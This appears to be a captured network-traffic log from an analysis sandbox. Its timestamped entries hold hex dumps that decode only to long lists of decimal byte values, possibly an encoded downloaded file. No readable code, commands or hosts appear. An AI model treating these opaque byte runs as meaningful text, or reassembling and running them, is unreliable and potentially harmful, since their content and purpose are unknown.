                                                                                                                                                                      2022-01-14 11:20:24 UTC81INData Raw: 32 36 2c 31 34 39 2c 39 39 2c 32 32 32 2c 31 38 32 2c 32 30 38 2c 34 2c 32 30 34 2c 31 31 37 2c 31 36 2c 32 34 30 2c 34 38 2c 33 39 2c 38 31 2c 31 36 37 2c 32 32 35 2c 32 30 35 2c 33 37 2c 31 38 38 2c 30 2c 32 31 33 2c 32 32 30 2c 31 35 35 2c 31 39 37 2c 38 34 2c 31 33 32 2c 31 35 2c 37 38 2c 32 31 32 2c 32 32 37 2c 31 30 37 2c 33 33 2c 31 39 39 2c 31 38 35 2c 31 37 38 2c 32 38 2c 32 32 2c 32 33 30 2c 31 37 38 2c 31 37 31 2c 31 39 2c 32 2c 32 30 32 2c 31 32 2c 31 37 33 2c 31 36 36 2c 31 30 2c 31 31 38 2c 32 30 38 2c 31 37 31 2c 32 30 35 2c 31 31 31 2c 31 35 30 2c 31 31 37 2c 31 34 2c 37 31 2c 32 33 34 2c 33 35 2c 31 34 32 2c 32 30 38 2c 31 34 37 2c 32 34 34 2c 32 34 33 2c 32 34 35 2c 31 37 32 2c 31 38 34 2c 32 34 39 2c 38 30 2c 32 34 31 2c 31 36 33 2c 32
                                                                                                                                                                      Data Ascii: 26,149,99,222,182,208,4,204,117,16,240,48,39,81,167,225,205,37,188,0,213,220,155,197,84,132,15,78,212,227,107,33,199,185,178,28,22,230,178,171,19,2,202,12,173,166,10,118,208,171,205,111,150,117,14,71,234,35,142,208,147,244,243,245,172,184,249,80,241,163,2
                                                                                                                                                                      2022-01-14 11:20:24 UTC97INData Raw: 34 34 2c 35 35 2c 37 37 2c 32 30 31 2c 31 30 35 2c 35 37 2c 31 35 32 2c 31 36 36 2c 32 32 38 2c 31 38 34 2c 36 35 2c 37 34 2c 31 34 32 2c 31 32 2c 38 32 2c 31 37 38 2c 31 34 32 2c 36 35 2c 37 34 2c 31 35 36 2c 39 35 2c 33 36 2c 32 31 39 2c 34 37 2c 35 33 2c 32 34 2c 31 32 33 2c 32 32 31 2c 39 2c 35 33 2c 38 35 2c 31 31 2c 31 38 32 2c 33 2c 35 31 2c 31 33 31 2c 32 34 37 2c 32 31 39 2c 32 33 38 2c 31 36 38 2c 37 31 2c 31 38 34 2c 32 31 37 2c 32 34 2c 32 30 36 2c 36 32 2c 35 30 2c 31 35 35 2c 36 32 2c 35 34 2c 32 33 37 2c 31 39 31 2c 32 33 39 2c 34 31 2c 32 30 30 2c 37 37 2c 31 31 38 2c 32 30 33 2c 31 30 31 2c 32 33 31 2c 31 30 39 2c 31 35 30 2c 31 34 32 2c 34 2c 35 36 2c 31 38 34 2c 31 32 33 2c 32 30 34 2c 31 31 31 2c 31 38 2c 31 33 39 2c 32 34 31 2c 32 30
                                                                                                                                                                      Data Ascii: 44,55,77,201,105,57,152,166,228,184,65,74,142,12,82,178,142,65,74,156,95,36,219,47,53,24,123,221,9,53,85,11,182,3,51,131,247,219,238,168,71,184,217,24,206,62,50,155,62,54,237,191,239,41,200,77,118,203,101,231,109,150,142,4,56,184,123,204,111,18,139,241,20
                                                                                                                                                                      2022-01-14 11:20:24 UTC113INData Raw: 2c 32 34 32 2c 32 33 31 2c 35 38 2c 31 32 32 2c 31 31 36 2c 38 37 2c 31 38 35 2c 31 30 32 2c 33 34 2c 31 30 33 2c 32 33 36 2c 36 31 2c 39 37 2c 32 38 2c 39 35 2c 31 37 37 2c 32 35 35 2c 32 30 30 2c 31 38 32 2c 32 30 30 2c 32 35 2c 31 31 39 2c 31 35 30 2c 32 33 34 2c 32 34 38 2c 32 32 2c 31 38 33 2c 31 30 39 2c 39 34 2c 32 31 30 2c 31 37 34 2c 32 30 30 2c 32 35 2c 31 30 32 2c 32 33 35 2c 35 36 2c 35 34 2c 31 34 33 2c 32 32 33 2c 31 34 36 2c 31 32 33 2c 34 31 2c 31 31 34 2c 31 39 38 2c 31 39 38 2c 32 33 32 2c 35 36 2c 31 31 38 2c 34 33 2c 31 39 31 2c 31 34 39 2c 31 30 39 2c 31 34 35 2c 35 31 2c 37 38 2c 32 35 2c 31 35 2c 31 37 39 2c 31 32 34 2c 31 36 33 2c 31 30 38 2c 31 33 39 2c 31 35 36 2c 38 31 2c 37 33 2c 32 31 34 2c 31 38 31 2c 32 32 31 2c 32 30 33 2c
                                                                                                                                                                      Data Ascii: ,242,231,58,122,116,87,185,102,34,103,236,61,97,28,95,177,255,200,182,200,25,119,150,234,248,22,183,109,94,210,174,200,25,102,235,56,54,143,223,146,123,41,114,198,198,232,56,118,43,191,149,109,145,51,78,25,15,179,124,163,108,139,156,81,73,214,181,221,203,
                                                                                                                                                                      2022-01-14 11:20:24 UTC129INData Raw: 31 36 37 2c 37 38 2c 32 30 39 2c 31 36 39 2c 31 33 31 2c 34 2c 33 2c 32 33 36 2c 31 37 34 2c 31 39 32 2c 31 37 38 2c 32 37 2c 36 37 2c 32 34 32 2c 31 32 36 2c 31 32 2c 31 31 34 2c 35 33 2c 31 39 31 2c 38 31 2c 31 34 32 2c 32 32 35 2c 37 36 2c 38 36 2c 32 34 34 2c 31 35 37 2c 32 32 34 2c 35 32 2c 32 31 30 2c 32 34 39 2c 36 37 2c 31 36 31 2c 32 30 37 2c 31 39 31 2c 34 38 2c 31 36 37 2c 32 32 36 2c 36 30 2c 31 38 30 2c 31 37 32 2c 38 33 2c 37 39 2c 32 34 2c 32 34 32 2c 31 30 36 2c 34 38 2c 31 30 30 2c 31 37 38 2c 32 33 31 2c 31 39 34 2c 31 38 37 2c 32 33 38 2c 32 32 34 2c 38 34 2c 31 31 37 2c 32 35 30 2c 31 38 36 2c 32 35 34 2c 32 32 30 2c 32 33 33 2c 32 31 38 2c 32 32 39 2c 32 31 32 2c 36 37 2c 31 30 30 2c 31 34 34 2c 31 39 35 2c 31 31 37 2c 32 30 39 2c 31
                                                                                                                                                                      Data Ascii: 167,78,209,169,131,4,3,236,174,192,178,27,67,242,126,12,114,53,191,81,142,225,76,86,244,157,224,52,210,249,67,161,207,191,48,167,226,60,180,172,83,79,24,242,106,48,100,178,231,194,187,238,224,84,117,250,186,254,220,233,218,229,212,67,100,144,195,117,209,1
                                                                                                                                                                      2022-01-14 11:20:24 UTC136INData Raw: 35 2c 31 38 35 2c 31 33 35 2c 31 33 31 2c 31 34 34 2c 34 38 2c 31 31 38 2c 32 33 35 2c 34 39 2c 36 36 2c 37 35 2c 32 30 33 2c 31 32 34 2c 37 31 2c 32 33 33 2c 32 33 39 2c 33 35 2c 31 30 39 2c 31 32 36 2c 32 35 33 2c 31 34 34 2c 39 34 2c 31 32 36 2c 31 31 31 2c 37 35 2c 37 31 2c 31 30 31 2c 31 34 37 2c 33 34 2c 31 39 32 2c 30 2c 31 39 38 2c 33 30 2c 31 35 32 2c 30 2c 32 2c 31 33 30 2c 32 32 34 2c 32 35 2c 31 39 39 2c 31 37 34 2c 31 35 2c 31 36 38 2c 39 32 2c 38 31 2c 39 38 2c 31 32 36 2c 31 33 33 2c 31 38 38 2c 30 2c 32 30 30 2c 32 33 38 2c 38 39 2c 31 31 2c 32 35 31 2c 31 32 2c 31 35 39 2c 34 33 2c 39 34 2c 31 35 35 2c 32 33 31 2c 31 37 39 2c 32 31 36 2c 31 33 32 2c 38 32 2c 32 31 31 2c 31 37 2c 31 33 30 2c 34 37 2c 32 32 2c 31 33 31 2c 39 33 2c 31 32 2c
                                                                                                                                                                      Data Ascii: 5,185,135,131,144,48,118,235,49,66,75,203,124,71,233,239,35,109,126,253,144,94,126,111,75,71,101,147,34,192,0,198,30,152,0,2,130,224,25,199,174,15,168,92,81,98,126,133,188,0,200,238,89,11,251,12,159,43,94,155,231,179,216,132,82,211,17,130,47,22,131,93,12,
                                                                                                                                                                      2022-01-14 11:20:24 UTC152INData Raw: 36 2c 37 39 2c 31 31 34 2c 39 32 2c 32 32 38 2c 31 34 30 2c 31 37 34 2c 32 35 30 2c 31 35 32 2c 34 30 2c 32 34 38 2c 33 30 2c 31 30 32 2c 31 37 36 2c 31 31 33 2c 31 35 30 2c 31 34 35 2c 31 32 2c 36 2c 32 32 36 2c 36 37 2c 32 35 31 2c 31 35 31 2c 35 32 2c 32 34 39 2c 32 34 31 2c 39 2c 39 36 2c 31 31 34 2c 37 38 2c 32 33 32 2c 31 37 34 2c 31 32 34 2c 37 39 2c 31 37 2c 35 34 2c 32 30 36 2c 32 34 36 2c 32 30 33 2c 31 36 38 2c 32 31 37 2c 31 33 30 2c 32 32 38 2c 35 33 2c 31 35 30 2c 32 34 34 2c 31 31 37 2c 31 34 36 2c 31 32 30 2c 31 37 37 2c 31 37 39 2c 32 34 34 2c 31 32 2c 36 33 2c 31 30 32 2c 39 35 2c 36 38 2c 31 39 30 2c 32 2c 32 32 37 2c 31 32 39 2c 32 31 30 2c 31 35 38 2c 32 34 36 2c 31 31 2c 32 33 32 2c 36 32 2c 35 37 2c 37 37 2c 31 30 34 2c 31 33 2c 31
                                                                                                                                                                      Data Ascii: 6,79,114,92,228,140,174,250,152,40,248,30,102,176,113,150,145,12,6,226,67,251,151,52,249,241,9,96,114,78,232,174,124,79,17,54,206,246,203,168,217,130,228,53,150,244,117,146,120,177,179,244,12,63,102,95,68,190,2,227,129,210,158,246,11,232,62,57,77,104,13,1
                                                                                                                                                                      2022-01-14 11:20:24 UTC168INData Raw: 2c 39 39 2c 32 30 32 2c 38 33 2c 39 34 2c 31 34 36 2c 31 38 30 2c 32 32 2c 31 31 34 2c 31 39 38 2c 31 39 39 2c 31 32 35 2c 31 31 37 2c 31 38 36 2c 35 35 2c 32 30 30 2c 37 32 2c 31 36 2c 32 31 35 2c 39 31 2c 31 34 39 2c 31 38 30 2c 31 35 30 2c 31 32 2c 39 35 2c 32 30 34 2c 31 30 35 2c 31 37 33 2c 31 37 31 2c 31 33 37 2c 36 37 2c 32 35 31 2c 35 31 2c 36 33 2c 33 30 2c 32 30 38 2c 32 30 33 2c 36 35 2c 38 30 2c 35 34 2c 31 37 33 2c 31 34 30 2c 31 33 33 2c 35 38 2c 31 32 30 2c 31 30 35 2c 33 31 2c 31 33 37 2c 37 32 2c 35 36 2c 31 31 37 2c 31 36 33 2c 31 35 31 2c 39 35 2c 31 38 32 2c 35 35 2c 31 33 38 2c 37 30 2c 33 32 2c 39 36 2c 39 30 2c 31 38 37 2c 37 35 2c 31 33 31 2c 32 32 31 2c 31 36 35 2c 34 2c 32 35 2c 32 31 36 2c 31 31 33 2c 38 32 2c 31 33 34 2c 39 36
                                                                                                                                                                      Data Ascii: ,99,202,83,94,146,180,22,114,198,199,125,117,186,55,200,72,16,215,91,149,180,150,12,95,204,105,173,171,137,67,251,51,63,30,208,203,65,80,54,173,140,133,58,120,105,31,137,72,56,117,163,151,95,182,55,138,70,32,96,90,187,75,131,221,165,4,25,216,113,82,134,96
                                                                                                                                                                      2022-01-14 11:20:24 UTC184INData Raw: 31 31 38 2c 32 30 34 2c 32 35 33 2c 36 2c 31 31 34 2c 32 33 33 2c 32 35 32 2c 31 33 37 2c 32 31 30 2c 32 36 2c 32 34 38 2c 32 37 2c 31 30 30 2c 37 33 2c 36 34 2c 31 39 39 2c 31 39 39 2c 31 30 34 2c 32 32 32 2c 31 37 37 2c 38 30 2c 32 32 38 2c 32 34 38 2c 32 33 39 2c 34 33 2c 32 33 31 2c 31 37 36 2c 32 34 37 2c 31 39 37 2c 39 34 2c 38 37 2c 32 31 30 2c 31 38 33 2c 32 39 2c 37 38 2c 34 30 2c 31 37 35 2c 32 35 32 2c 38 31 2c 32 30 31 2c 31 36 31 2c 31 31 31 2c 31 37 36 2c 37 2c 31 33 31 2c 31 37 33 2c 35 31 2c 32 32 36 2c 32 30 31 2c 32 31 37 2c 37 31 2c 31 34 34 2c 31 38 39 2c 31 38 2c 31 36 39 2c 32 30 32 2c 32 32 30 2c 36 39 2c 31 32 30 2c 37 30 2c 31 30 34 2c 31 2c 31 31 34 2c 36 37 2c 37 35 2c 31 34 35 2c 39 37 2c 31 34 38 2c 32 32 32 2c 31 37 36 2c 31
                                                                                                                                                                      Data Ascii: 118,204,253,6,114,233,252,137,210,26,248,27,100,73,64,199,199,104,222,177,80,228,248,239,43,231,176,247,197,94,87,210,183,29,78,40,175,252,81,201,161,111,176,7,131,173,51,226,201,217,71,144,189,18,169,202,220,69,120,70,104,1,114,67,75,145,97,148,222,176,1
                                                                                                                                                                      2022-01-14 11:20:24 UTC200INData Raw: 2c 37 30 2c 32 31 36 2c 37 39 2c 38 37 2c 31 34 34 2c 33 37 2c 32 33 31 2c 35 30 2c 35 30 2c 31 33 36 2c 39 32 2c 32 33 30 2c 32 31 39 2c 31 30 35 2c 37 38 2c 38 32 2c 39 30 2c 31 30 33 2c 31 31 32 2c 32 37 2c 38 36 2c 39 35 2c 32 35 34 2c 31 31 39 2c 36 30 2c 31 35 31 2c 32 35 35 2c 32 39 2c 31 31 31 2c 32 31 38 2c 32 30 39 2c 31 37 30 2c 38 31 2c 31 33 35 2c 31 37 37 2c 31 35 2c 32 32 38 2c 31 34 33 2c 31 34 39 2c 31 34 34 2c 32 34 39 2c 31 31 36 2c 32 34 37 2c 32 32 35 2c 31 39 37 2c 31 33 38 2c 30 2c 32 31 38 2c 31 30 30 2c 33 31 2c 32 39 2c 32 31 36 2c 31 37 36 2c 39 31 2c 31 32 39 2c 37 37 2c 31 32 30 2c 35 31 2c 32 31 37 2c 36 37 2c 32 34 35 2c 38 32 2c 32 30 32 2c 32 34 37 2c 32 32 33 2c 32 32 32 2c 31 36 36 2c 31 35 37 2c 32 32 2c 32 33 36 2c 37
                                                                                                                                                                      Data Ascii: ,70,216,79,87,144,37,231,50,50,136,92,230,219,105,78,82,90,103,112,27,86,95,254,119,60,151,255,29,111,218,209,170,81,135,177,15,228,143,149,144,249,116,247,225,197,138,0,218,100,31,29,216,176,91,129,77,120,51,217,67,245,82,202,247,223,222,166,157,22,236,7
                                                                                                                                                                      2022-01-14 11:20:24 UTC206INData Raw: 2c 35 34 2c 32 33 31 2c 31 33 31 2c 31 37 34 2c 36 32 2c 31 32 30 2c 32 33 32 2c 33 38 2c 32 31 37 2c 38 2c 31 35 33 2c 31 31 33 2c 36 30 2c 31 37 32 2c 31 37 36 2c 32 33 2c 33 37 2c 34 31 2c 32 30 36 2c 31 34 35 2c 32 33 34 2c 33 30 2c 37 33 2c 34 31 2c 35 37 2c 32 33 34 2c 33 30 2c 31 33 39 2c 32 31 35 2c 31 32 36 2c 36 2c 31 36 38 2c 32 31 2c 31 36 2c 32 34 38 2c 31 39 32 2c 31 32 35 2c 32 30 39 2c 31 38 36 2c 37 38 2c 35 36 2c 32 34 37 2c 31 36 36 2c 32 32 31 2c 39 37 2c 32 38 2c 37 39 2c 31 33 35 2c 31 34 34 2c 32 34 34 2c 33 36 2c 38 30 2c 31 38 34 2c 31 39 31 2c 31 32 33 2c 31 38 38 2c 31 31 36 2c 32 32 32 2c 37 37 2c 31 38 31 2c 36 2c 31 34 35 2c 31 37 39 2c 31 30 2c 32 30 36 2c 37 2c 31 36 33 2c 37 34 2c 31 37 35 2c 32 34 30 2c 31 30 35 2c 31 32
                                                                                                                                                                      Data Ascii: ,54,231,131,174,62,120,232,38,217,8,153,113,60,172,176,23,37,41,206,145,234,30,73,41,57,234,30,139,215,126,6,168,21,16,248,192,125,209,186,78,56,247,166,221,97,28,79,135,144,244,36,80,184,191,123,188,116,222,77,181,6,145,179,10,206,7,163,74,175,240,105,12
                                                                                                                                                                      2022-01-14 11:20:24 UTC222INData Raw: 37 2c 31 39 32 2c 32 31 30 2c 35 39 2c 35 37 2c 32 32 2c 31 31 30 2c 32 30 39 2c 31 31 2c 31 30 39 2c 36 38 2c 31 30 34 2c 34 2c 31 38 30 2c 39 39 2c 31 34 30 2c 31 33 35 2c 37 31 2c 31 31 30 2c 36 37 2c 37 33 2c 31 38 2c 31 39 34 2c 32 34 31 2c 31 36 2c 37 33 2c 38 34 2c 38 37 2c 32 30 33 2c 38 38 2c 31 38 39 2c 31 38 2c 32 37 2c 31 36 33 2c 38 37 2c 35 30 2c 32 35 32 2c 32 2c 31 39 34 2c 39 34 2c 32 31 35 2c 31 37 30 2c 32 33 39 2c 31 38 39 2c 37 39 2c 33 32 2c 37 38 2c 38 33 2c 31 38 32 2c 31 37 30 2c 31 32 33 2c 31 32 34 2c 32 31 37 2c 32 31 2c 31 37 30 2c 31 30 35 2c 32 39 2c 32 38 2c 34 33 2c 32 33 38 2c 31 39 2c 32 33 33 2c 33 39 2c 38 32 2c 32 30 2c 33 34 2c 33 35 2c 31 36 2c 38 32 2c 32 30 32 2c 31 31 2c 32 31 32 2c 32 33 34 2c 38 37 2c 32 31 33
                                                                                                                                                                      Data Ascii: 7,192,210,59,57,22,110,209,11,109,68,104,4,180,99,140,135,71,110,67,73,18,194,241,16,73,84,87,203,88,189,18,27,163,87,50,252,2,194,94,215,170,239,189,79,32,78,83,182,170,123,124,217,21,170,105,29,28,43,238,19,233,39,82,20,34,35,16,82,202,11,212,234,87,213
                                                                                                                                                                      2022-01-14 11:20:24 UTC238INData Raw: 37 2c 33 30 2c 31 34 33 2c 31 35 39 2c 36 31 2c 32 34 38 2c 37 37 2c 32 34 36 2c 32 32 38 2c 32 31 33 2c 32 33 38 2c 38 35 2c 36 30 2c 32 31 2c 36 33 2c 31 32 33 2c 32 32 37 2c 31 36 31 2c 35 30 2c 38 31 2c 31 39 38 2c 31 33 30 2c 32 31 30 2c 32 33 31 2c 31 34 39 2c 32 34 36 2c 31 34 34 2c 31 39 36 2c 35 37 2c 31 33 34 2c 31 34 2c 33 32 2c 31 31 35 2c 34 30 2c 38 32 2c 38 39 2c 31 36 32 2c 35 38 2c 31 31 32 2c 33 31 2c 31 33 30 2c 31 34 33 2c 32 32 39 2c 31 37 31 2c 31 36 31 2c 31 34 2c 37 2c 32 33 37 2c 35 30 2c 31 35 39 2c 31 39 2c 31 38 34 2c 39 39 2c 37 31 2c 31 39 2c 31 38 2c 31 37 30 2c 31 30 33 2c 34 36 2c 37 33 2c 34 37 2c 39 36 2c 32 31 31 2c 32 33 31 2c 35 2c 39 31 2c 36 37 2c 32 30 30 2c 31 32 32 2c 34 34 2c 31 36 38 2c 39 34 2c 31 32 30 2c 32
                                                                                                                                                                      Data Ascii: 7,30,143,159,61,248,77,246,228,213,238,85,60,21,63,123,227,161,50,81,198,130,210,231,149,246,144,196,57,134,14,32,115,40,82,89,162,58,112,31,130,143,229,171,161,14,7,237,50,159,19,184,99,71,19,18,170,103,46,73,47,96,211,231,5,91,67,200,122,44,168,94,120,2
                                                                                                                                                                      2022-01-14 11:20:24 UTC254INData Raw: 2c 32 37 2c 39 2c 32 32 36 2c 31 39 39 2c 31 38 34 2c 31 35 31 2c 31 39 34 2c 32 34 36 2c 35 38 2c 36 35 2c 36 33 2c 31 32 39 2c 36 36 2c 32 34 32 2c 31 34 38 2c 31 32 33 2c 33 37 2c 31 34 36 2c 31 30 37 2c 38 30 2c 34 30 2c 31 30 35 2c 31 32 35 2c 31 39 2c 31 36 36 2c 32 33 35 2c 32 31 35 2c 39 39 2c 33 2c 34 34 2c 37 35 2c 39 30 2c 31 33 36 2c 31 30 30 2c 31 30 34 2c 31 37 33 2c 31 39 37 2c 31 37 30 2c 32 35 33 2c 34 32 2c 31 39 36 2c 31 36 32 2c 32 30 35 2c 34 35 2c 32 30 35 2c 32 31 34 2c 32 30 32 2c 37 37 2c 31 35 30 2c 32 30 38 2c 39 31 2c 31 31 36 2c 31 37 30 2c 31 30 34 2c 32 34 38 2c 36 2c 31 31 34 2c 33 38 2c 32 30 36 2c 31 33 2c 31 37 35 2c 38 32 2c 31 33 37 2c 32 30 39 2c 31 38 37 2c 31 37 2c 33 33 2c 31 30 34 2c 32 30 32 2c 32 32 33 2c 31 39
                                                                                                                                                                      Data Ascii: ,27,9,226,199,184,151,194,246,58,65,63,129,66,242,148,123,37,146,107,80,40,105,125,19,166,235,215,99,3,44,75,90,136,100,104,173,197,170,253,42,196,162,205,45,205,214,202,77,150,208,91,116,170,104,248,6,114,38,206,13,175,82,137,209,187,17,33,104,202,223,19
                                                                                                                                                                      2022-01-14 11:20:24 UTC270INData Raw: 31 39 2c 38 32 2c 38 31 2c 31 30 34 2c 31 34 36 2c 37 39 2c 34 38 2c 31 36 38 2c 39 38 2c 32 32 38 2c 31 33 36 2c 32 32 35 2c 39 36 2c 32 31 38 2c 38 38 2c 31 31 31 2c 35 32 2c 31 39 36 2c 33 32 2c 31 31 32 2c 31 39 33 2c 33 37 2c 31 37 36 2c 31 38 37 2c 32 2c 31 31 38 2c 32 31 35 2c 32 30 39 2c 39 36 2c 31 37 32 2c 31 34 31 2c 31 33 33 2c 31 37 35 2c 38 38 2c 31 34 39 2c 36 33 2c 31 37 38 2c 31 39 32 2c 32 32 30 2c 33 38 2c 31 30 34 2c 32 32 32 2c 31 36 34 2c 35 33 2c 36 30 2c 31 30 36 2c 31 38 38 2c 31 38 2c 31 35 34 2c 32 32 30 2c 31 39 30 2c 37 32 2c 31 32 39 2c 31 2c 33 38 2c 31 2c 31 34 33 2c 31 36 39 2c 32 35 34 2c 31 33 31 2c 32 2c 31 34 2c 31 38 2c 31 38 37 2c 34 32 2c 32 35 32 2c 31 33 33 2c 32 37 2c 32 2c 37 31 2c 32 32 34 2c 35 37 2c 31 34 36
                                                                                                                                                                      Data Ascii: 19,82,81,104,146,79,48,168,98,228,136,225,96,218,88,111,52,196,32,112,193,37,176,187,2,118,215,209,96,172,141,133,175,88,149,63,178,192,220,38,104,222,164,53,60,106,188,18,154,220,190,72,129,1,38,1,143,169,254,131,2,14,18,187,42,252,133,27,2,71,224,57,146
                                                                                                                                                                      2022-01-14 11:20:24 UTC286INData Raw: 32 35 35 2c 36 37 2c 32 35 31 2c 31 34 33 2c 31 32 30 2c 38 38 2c 32 31 36 2c 35 2c 31 32 32 2c 32 38 2c 32 33 2c 35 34 2c 32 34 30 2c 32 34 30 2c 35 37 2c 31 37 36 2c 32 32 31 2c 31 39 39 2c 32 35 31 2c 32 30 38 2c 31 37 37 2c 32 32 37 2c 31 34 2c 31 2c 31 35 38 2c 36 32 2c 32 33 31 2c 32 30 37 2c 31 35 38 2c 36 33 2c 31 30 39 2c 32 33 38 2c 31 32 36 2c 37 38 2c 31 33 36 2c 37 39 2c 38 39 2c 31 35 34 2c 31 33 34 2c 37 39 2c 31 34 34 2c 31 33 38 2c 38 31 2c 39 31 2c 31 33 33 2c 31 34 31 2c 31 34 36 2c 38 33 2c 39 35 2c 31 33 32 2c 31 34 33 2c 31 35 33 2c 31 39 39 2c 32 31 36 2c 32 30 30 2c 32 30 34 2c 36 35 2c 32 37 2c 31 39 37 2c 37 39 2c 31 33 31 2c 31 30 32 2c 31 36 37 2c 35 34 2c 32 31 32 2c 35 39 2c 37 31 2c 34 33 2c 31 38 38 2c 36 39 2c 36 38 2c 31
                                                                                                                                                                      Data Ascii: 255,67,251,143,120,88,216,5,122,28,23,54,240,240,57,176,221,199,251,208,177,227,14,1,158,62,231,207,158,63,109,238,126,78,136,79,89,154,134,79,144,138,81,91,133,141,146,83,95,132,143,153,199,216,200,204,65,27,197,79,131,102,167,54,212,59,71,43,188,69,68,1
                                                                                                                                                                      2022-01-14 11:20:24 UTC302INData Raw: 31 39 37 2c 31 38 37 2c 31 39 35 2c 31 39 2c 32 32 37 2c 31 32 35 2c 37 39 2c 31 39 38 2c 37 31 2c 32 33 30 2c 31 32 36 2c 36 32 2c 32 34 38 2c 35 37 2c 32 35 35 2c 31 30 39 2c 32 34 36 2c 32 33 33 2c 32 30 32 2c 32 30 34 2c 32 32 30 2c 32 34 30 2c 32 30 38 2c 32 30 38 2c 31 34 33 2c 32 30 39 2c 33 31 2c 33 35 2c 31 38 33 2c 31 33 30 2c 31 37 34 2c 36 39 2c 32 34 35 2c 37 2c 39 35 2c 37 35 2c 31 33 37 2c 31 35 2c 31 34 31 2c 31 32 31 2c 32 38 2c 33 31 2c 31 32 32 2c 35 31 2c 32 35 34 2c 37 34 2c 32 33 36 2c 31 34 39 2c 31 33 32 2c 31 30 37 2c 31 33 37 2c 32 33 33 2c 31 34 35 2c 31 37 37 2c 31 36 39 2c 32 33 2c 39 35 2c 32 34 35 2c 32 34 37 2c 31 32 36 2c 32 33 36 2c 32 30 33 2c 32 30 36 2c 31 37 33 2c 31 37 34 2c 32 30 31 2c 31 37 31 2c 31 33 37 2c 31 37
                                                                                                                                                                      Data Ascii: 197,187,195,19,227,125,79,198,71,230,126,62,248,57,255,109,246,233,202,204,220,240,208,208,143,209,31,35,183,130,174,69,245,7,95,75,137,15,141,121,28,31,122,51,254,74,236,149,132,107,137,233,145,177,169,23,95,245,247,126,236,203,206,173,174,201,171,137,17
                                                                                                                                                                      2022-01-14 11:20:25 UTC305INData Raw: 30 2c 31 36 37 2c 32 34 37 2c 39 30 2c 32 37 2c 35 38 2c 32 33 38 2c 31 38 30 2c 31 37 36 2c 31 38 31 2c 35 30 2c 31 37 38 2c 31 31 39 2c 31 34 34 2c 32 32 31 2c 32 33 33 2c 31 31 38 2c 32 33 34 2c 31 36 30 2c 31 37 31 2c 32 35 31 2c 31 37 37 2c 36 37 2c 37 2c 31 33 2c 31 35 37 2c 31 34 32 2c 32 38 2c 32 34 35 2c 35 37 2c 31 32 31 2c 32 31 32 2c 31 32 35 2c 32 33 35 2c 31 32 36 2c 37 39 2c 35 35 2c 32 35 33 2c 32 32 37 2c 33 30 2c 32 35 32 2c 37 36 2c 31 38 38 2c 38 32 2c 32 30 2c 31 30 32 2c 31 35 34 2c 31 32 2c 31 37 32 2c 34 34 2c 39 32 2c 37 36 2c 32 38 2c 31 34 38 2c 31 36 32 2c 31 30 2c 32 31 30 2c 32 34 36 2c 31 37 30 2c 32 32 30 2c 31 38 30 2c 35 36 2c 36 32 2c 31 32 36 2c 31 32 2c 36 33 2c 39 30 2c 31 33 32 2c 31 33 38 2c 31 35 35 2c 31 35 37 2c
                                                                                                                                                                      Data Ascii: 0,167,247,90,27,58,238,180,176,181,50,178,119,144,221,233,118,234,160,171,251,177,67,7,13,157,142,28,245,57,121,212,125,235,126,79,55,253,227,30,252,76,188,82,20,102,154,12,172,44,92,76,28,148,162,10,210,246,170,220,180,56,62,126,12,63,90,132,138,155,157,
                                                                                                                                                                      2022-01-14 11:20:25 UTC321INData Raw: 32 35 31 2c 31 38 36 2c 32 35 30 2c 32 35 30 2c 31 33 36 2c 32 31 32 2c 32 30 30 2c 31 34 34 2c 32 31 35 2c 31 31 37 2c 32 39 2c 31 37 35 2c 35 39 2c 32 33 34 2c 31 38 2c 31 32 33 2c 32 33 35 2c 39 31 2c 32 32 32 2c 31 39 39 2c 31 38 38 2c 31 30 35 2c 32 33 37 2c 32 33 34 2c 31 32 32 2c 31 34 36 2c 34 38 2c 32 31 32 2c 32 35 31 2c 32 34 31 2c 32 35 33 2c 32 33 31 2c 31 39 37 2c 31 35 36 2c 32 30 31 2c 32 33 33 2c 31 33 33 2c 32 30 31 2c 32 33 33 2c 31 36 31 2c 31 31 31 2c 31 35 39 2c 32 33 39 2c 31 32 34 2c 32 36 2c 32 35 31 2c 35 37 2c 31 38 32 2c 34 38 2c 32 32 31 2c 32 32 30 2c 32 31 35 2c 32 35 30 2c 31 37 38 2c 32 34 37 2c 37 37 2c 31 32 33 2c 38 37 2c 32 34 31 2c 32 34 38 2c 31 30 30 2c 31 31 38 2c 39 37 2c 37 35 2c 37 39 2c 32 35 32 2c 36 34 2c 39
                                                                                                                                                                      Data Ascii: 251,186,250,250,136,212,200,144,215,117,29,175,59,234,18,123,235,91,222,199,188,105,237,234,122,146,48,212,251,241,253,231,197,156,201,233,133,201,233,161,111,159,239,124,26,251,57,182,48,221,220,215,250,178,247,77,123,87,241,248,100,118,97,75,79,252,64,9
                                                                                                                                                                      2022-01-14 11:20:25 UTC337INData Raw: 37 31 2c 31 2c 32 30 34 2c 31 30 30 2c 32 32 35 2c 37 31 2c 31 30 36 2c 31 37 38 2c 32 34 30 2c 32 35 2c 31 35 34 2c 37 36 2c 32 30 33 2c 37 36 2c 39 33 2c 38 38 2c 32 32 33 2c 31 37 38 2c 31 35 38 2c 31 30 38 2c 33 36 2c 31 31 33 2c 32 39 2c 31 32 30 2c 31 34 35 2c 31 36 38 2c 39 37 2c 34 34 2c 31 33 2c 32 33 31 2c 31 34 31 2c 31 31 35 2c 35 38 2c 31 35 32 2c 31 34 33 2c 31 38 35 2c 32 30 35 2c 31 39 34 2c 32 35 2c 31 35 38 2c 31 33 31 2c 34 35 2c 34 37 2c 32 30 30 2c 32 33 37 2c 33 38 2c 32 32 36 2c 38 30 2c 32 32 36 2c 35 38 2c 31 37 36 2c 33 39 2c 31 32 33 2c 31 34 35 2c 31 32 30 2c 38 31 2c 31 38 32 2c 39 35 2c 31 39 33 2c 34 30 2c 36 37 2c 34 39 2c 32 30 32 2c 31 33 39 2c 32 34 2c 32 32 39 2c 36 39 2c 31 34 30 2c 31 39 34 2c 31 32 31 2c 31 34 33 2c
                                                                                                                                                                      Data Ascii: 71,1,204,100,225,71,106,178,240,25,154,76,203,76,93,88,223,178,158,108,36,113,29,120,145,168,97,44,13,231,141,115,58,152,143,185,205,194,25,158,131,45,47,200,237,38,226,80,226,58,176,39,123,145,120,81,182,95,193,40,67,49,202,139,24,229,69,140,194,121,143,
